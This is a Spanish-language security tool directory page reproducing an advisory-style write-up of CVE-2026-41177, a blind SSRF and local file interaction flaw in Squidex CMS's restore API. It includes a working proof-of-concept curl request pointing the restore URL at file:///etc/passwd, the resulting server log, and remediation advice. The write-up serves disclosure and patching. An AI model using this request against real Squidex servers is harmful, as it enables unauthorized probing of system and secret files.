Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-41177-Squidex-CMS — CVE-2026-41177, una vulnerabilidad Blind SSRF en Squidex CMS (anterior a v7.23.0). Incluye análisis de causa raíz, pasos de reproducción y evaluación de impacto respecto a la Interacción con Archivos Locales (LFI). | Kitploit
Herramientas/GitHubGitHub/turkios/cve-2026-41177-squidex-cms
Análisis de VulnerabilidadesExplotaciónSeguridad WebAprendizaje y Educación
GitHubturkios/cve-2026-41177-squidex-cms

CVE-2026-41177-Squidex-CMS

CVE-2026-41177, una vulnerabilidad Blind SSRF en Squidex CMS (anterior a v7.23.0). Incluye análisis de causa raíz, pasos de reproducción y evaluación de impacto respecto a la Interacción con Archivos Locales (LFI).

Ver Repositorio
hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-41177: SSRF ciego en Squidex CMS

Investigación y análisis técnico de CVE-2026-41177: una vulnerabilidad de Server-Side Request Forgery (SSRF) ciego en la API de Restauración de Squidex CMS.

Resumen de la vulnerabilidad

  • ID de CVE: CVE-2026-41177
  • Componente afectado: API de Squidex: Motor de Backup / Restauración (/api/apps/restore)
  • Versiones afectadas: < 7.23.0
  • Tipo de vulnerabilidad: SSRF ciego (CWE-918), Interacción con archivos locales (CWE-73)

Resumen

La API de Restauración de Squidex es vulnerable a Server-Side Request Forgery (SSRF) ciego. La aplicación no valida el esquema de URI del parámetro Url proporcionado por el usuario, lo que permite el uso del protocolo file://. Esto permite que un administrador autenticado fuerce al servidor backend a interactuar con el sistema de archivos local, lo que conduce a Interacción con Archivos Locales (LFI) y a la posible divulgación de información sensible del sistema mediante análisis de canal lateral de los registros internos.

Detalles

  1. Configuración: Un atacante crea un trabajo de "Restauración" utilizando un URI del sistema de archivos local (por ejemplo, file:///etc/passwd).
  2. Activación: El atacante envía la solicitud POST al endpoint de restauración.
  3. Ejecución: El backend acepta la solicitud y pasa la URL a un trabajador en segundo plano (RestoreJob).
  4. Observación: Mientras que la respuesta de la API es un genérico 204 No Content, los registros internos del servidor revelan que el servidor abrió y leyó el archivo con éxito antes de fallar porque el contenido no era un archivo ZIP válido.

Prueba de Concepto (PoC)

1. Solicitud maliciosa

Ejecute el siguiente comando curl (reemplace <TOKEN> con un token de administrador válido):

root@kitploit:~
curl -X POST http://localhost/api/apps/restore/ \
  -H 'Authorization: Bearer <TOKEN>' \
  -H 'Content-Type: application/json' \
  -d '{
    "Url": "file:///etc/passwd",
    "Name": "exploit-poc"
  }' -v

2. Validación mediante registros

El siguiente error en los registros del contenedor de Squidex confirma la interacción interna con el archivo:

root@kitploit:~
{
  "logLevel": "Error",
  "message": "Backup with job id 381bcfcb-3701-44d0-a8c8-ea43b3ec6271 from URL 'file:///etc/passwd' failed.",
  "exception": {
    "type": "System.IO.InvalidDataException",
    "message": "End of Central Directory record could not be found.",
    "stackTrace": "at System.IO.Compression.ZipArchive.ReadEndOfCentralDirectory()\n at System.IO.Compression.ZipArchive..ctor(Stream stream...)\n at Squidex.Domain.Apps.Entities.Backup.BackupReader..ctor(...) in BackupReader.cs:line 42\n at Squidex.Domain.Apps.Entities.Backup.TempFolderBackupArchiveLocation.OpenReaderAsync(...) in TempFolderBackupArchiveLocation.cs:line 57"
  }
}

Nota: La InvalidDataException confirma que el servidor accedió y leyó con éxito los bytes del archivo.

Impacto

Esta vulnerabilidad permite a atacantes autenticados:

  • Reconocimiento del sistema de archivos: Confirmar la presencia de archivos sensibles (por ejemplo, appsettings.json, secretos).
  • Divulgación de información: En entornos multiinquilino, esto podría potencialmente utilizarse para acceder a los archivos de backup de otros usuarios.

Remediación

  • Actualización: Actualice a la versión 7.23.0 o posterior de Squidex.
  • Lista blanca de protocolos: Permita estrictamente solo los esquemas http:// y https://.
  • Validación de entrada: Implemente una verificación para rechazar cualquier URI que utilice el esquema file:// antes del procesamiento.
  • Manejo seguro de E/S: Asegúrese de que los manejadores subyacentes estén restringidos de la resolución del sistema de archivos local para entradas proporcionadas por el usuario.

Referencias

  • Aviso de seguridad de GitHub (GHSA-45fq-w37p-qfw5)
  • Registro oficial de CVE
Descargar herramienta